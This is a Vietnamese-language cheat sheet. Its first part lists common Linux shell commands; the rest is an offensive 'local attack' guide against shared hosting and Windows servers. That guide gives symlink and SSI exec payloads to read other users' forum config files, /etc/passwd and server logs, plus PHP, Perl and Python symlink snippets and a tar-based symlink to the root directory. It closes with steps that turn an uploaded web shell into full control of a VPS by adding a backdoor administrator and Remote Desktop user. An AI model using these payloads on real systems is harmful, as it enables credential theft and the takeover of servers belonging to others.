Local

1. --------------------------------------------------------
2. - Lệnh hay dùng trên shell, method local, v...v...v... -
3. --------------------------------------------------------
4. ls: lấy danh sách tất cả các file và folder trong folder hiện hành.
5. pwd: xuất đường dẫn của folder làm việc.
6. cd: thay đổi folder làm việc đến một folder mới.
7. mkdir: tạo folder mới. | mkdir MonKira | Tạo Thư Mục MonKira
8. rmdir: xoá folder rỗng. | rmdir MonKira | Xóa Thư Mục MonKira
9. rm -r: xóa thư mục và tất cả tập tin và thư mục con trong thư mục đó | rm -r MonKira | Xóa thưu mục + các file trong thư mục
10. cp: copy file | cp /home/MonKira/public_html/MonKira.php /home/MonKira/public_html/MonKira002.php |
11. mv: đổi tên hay di chuyển file, folder.
12. rm: xóa file. | rm MonKira.php | xóa file MonKira.php
13. wc: đếm số dòng, số kí tự | wc MonKira.php | #Số dòng #Số từ #Số ký tự MonKira.php
14. touch: tạo file. | touch MonKira.php | Tạo file MonKira.php
15. cat=less=more: xem nội dung file. | cat MonKira.php | xem nội dung file MonKira.php
16. vi: khởi động trình soạn thảo văn bản vi.
17. df: kiểm tra disk space. không gian đĩa
18. du: xem disk space đã dùng cho một số file nhất định.
19. tar -cvzpf archive.tgz /home/example/public_html/folder: nén một folder
20. tar -tzf backup.tar.gz: liệt kê file nén gz.
21. tar -xvf archive.tar: giải nén một file tar.
22. unzip MonKira.zip: giải nén MonKira .zip
23. wget: download file. | wget http://www.google.com/robots.txt |
24. chown -hR user:user folder/ : Đổi owner cho folder hay file.
25. tail 100 matbao.log: Xem 100 dòng cuối cùng của file matbao.log.
26. date: xem ngày, giờ hệ thống.
27. cal: Hiển thị lịch
28. info: Hiển thị thông tin và tài liệu trên shell, các tiện ích và chương trình.
29. grep: grep chuoi tentaptin: tìm kiếm chuỗi trong tập tin
30. head: | head tentaptin | Hiển thị 10 dòng đầu tiên của tập tin
31. tail |tail tentaptin | Hiển thị 10 dòng cuối cùng của tập tin
32. mv: Di chuyển hoặc đổi tên tập tin | mv tentaptincu tentaptinmoi | mv MonKira.php MonKira.php |
33. echo chuoi: Sao chép chuỗi tới màn hình dòng lệnh | echo Checked By: MonKira |
34. gzip: Nén một tập tin | gzip tentaptin | gzip MonKira.php | gzip /home/MonKira/public_html/MonKira.php |
35. gunzip : giải nén tệp tin | gunzip tenteptin.gz | gunzip /home/MonKira/public_html/MonKira.gz |
36. which lenh: Hiển thị đường dẫn tới lệnh
37. whereis lenh: Hiển thị đường tới nơi chứa lệnh
38. who: Hiển thị các người dùng đã đang nhập
39. chmod: thay đổi quyền thư mục/tệp tin | chmod 777 MonKira / chmod 777 MonKira.php |
40. hostname: Hiển thị tên định danh của hệ thống
41. clear: làm sạch cửa sổ dòng lệnh
42. sleep: cho hệ thống ngừng hoạt động trong một khoảng thời gian. | sleep 5 | tính bằng giây
43. cat /proc/cpuinfo: Tìm chi tiết kỹ thuật của CPU
44. cat /proc/meminfo: Bộ nhớ và trang đổi thông tin.
45. uname -r: Xem hạt nhân phiên bản. kernel
46. gcc -v: Compiler phiên bản nào tôi đã cài đặt.
47. /sbin/ifconfig: Xem các địa chỉ IP
48. reboot: khởi động lại hệ thống. phải có quyền root
49.  
50. ////////////////////////// Local attack ////////////////////////////////////////
51.  
52. Sử dụng symlink kết hợp với ssi khi bị 403 forbinden:
53. symbolick : Ln -s /home/vhbgroup/public_html/@4rum/includes/config.php MonKira.ini
54. Đối với 1 sô server khi symbolick link bình thường xuất hiên 403 forbinden – không cho phép đọc file đã được symlink thì giải pháp được nghĩ đến đó là kết hợp với ssi.
55. - Tạo 1 file MonKira.shtml với nội dung như sau:
56. <!--#include virtual="MonKira.ini"-->
57. Trong đó file MonKira.ini là file đã được symbolic link trên server.
58. Bây giờ view source của file MonKira.shtml ta sẽ thấy đc nội dung file MonKira.ini đã symbolic link.
59. hoặc: <!--#exec cmd="dir /home/victim/public_html/" -->
60. ------------------------------------------------------------------------
61. Chạy lệnh bằng file .shtml
62. - Tuy nhiên có 1 số server cả 2 cách đó đều không áp dụng được nhưng nó lại cho chạy lệnh bằng file .shtml
63. <!--#exec cmd="cat /etc/passwd"-->
64. - Lệnh xem file logs như sau:
65. <!--#exec cmd="tail -n 10000 /var/log/httpd/domains/vhbgroup.net.error.log"-->
66. Lưu ý: + lệnh tail cũng giống như lệnh cat nhưng nó dùng để xem nhưng dòng cuối cùng của file trên server.
67. + /var/log/httpd/domains/vhbgroup.net.error.log là path dẫn đến file error.log của direct admin
68. + Còn path dẫn đến file error.log của cpanel là: /usr/local/apache/logs/error_log ….., tùy vào bộ cài host mà path dẫn đến file error.log khác nhau.
69.  
70. >>>>>>>>>>>>>>>>>>>>>>>>>>>>>Tư duy Local Nâng cao ( Tạo File symlink )
71. [+] Tạo symlink qua run command
72. Khi không thể run command bằng PHP shell ta run command bằng perl , python shell
73. ln -s /home/user/public_html/forum/includes/config.php 1.txt
74. [+] Tạo file symlink bằng hàm của PHP
75. <?php
76. $target = '/home/user_target/public_html/forum/includes/config.php';
77. $link = '/home/user/public_html/1.txt';
78. symlink($target, $link);
79. ?>
80. [+] Tạo File symlink nhờ perl , python
81. #!/usr/bin/perl -w
82. symlink('/etc/passwd','/root/Desktop/sym.txt');
83.  
84. #!/usr/bin/python
85. print "Content-type: text/html\n\n"
86. import os
87. filename = "1.txt"
88. linkto = "/etc/passwd"
89. os.symlink(linkto, filename)
90.  
91. [+] Thông qua bug
92. http://pastebin.com/DghFwrEP
93.  
94. [+] Indirect Symlink
95. Cơ sở là tạo 1 file symlink ở 1 nơi có thể tạo được rồi nén lại
96. Upload lên nơi cần symlink rồi giải nén
97. ln -s / r00t -> Tạo File symlink với thư mục /
98. tar czvf r00t.tar.gz r00t -> Nén file r00t thành r00t.tar.gz
99. Giải nén
100. tar xzf r00t.tar.gz
101. >>>>>>>>>>>>>> WinDows
102. ______________________________________________
103. | Chiếm quyền Dedicated Windows Server (VPS) |
104. | (Chiếm VPS Từ Shell) |
105. ----------------------------------------------
106. [Các bước thực hiện]
107. {1} Trước tiên các bạn cần phải có 1 con Shell trên server có khả năng sử dụng command line (Ở đây các bạn có thể khai thác các lỗ hổng của website để up shell).
108.  
109. {2} Cần phải có full quyền Administrator/Root cho user. Nếu tài khoản user trên server đang sử dụng không có full
110. quyền thì bạn có thể dùng exploit shellcode để khai thác nâng quyền.
111.  
112. {3} Sau khi có shell trên server, các bạn có thể cài backdoor hoặc sử dụng ngay chức năng run CMD trên shell của bạn.
113.  
114. {4} Tạo 1 user mới trên server bằng lệnh. Trong đó MonKira là User và MonKira@001 là mật khẩu:
115. net user MonKira MonKira@001 /ADD
116.  
117. {5} Set quyền remote desktop cho user MonKira bằng lệnh:
118. net localgroup "Remote Desktop Users" MonKira /ADD
119.  
120. {6} Nếu thành công thì bạn sẽ nhận được kết quả trả về như sau:
121. The command completed successfully.
122. {7} Sử dụng chức năng Remote Desktop của Windows để kết nối và điều khiển server !
123. -----------------------------------------------------------------------------------------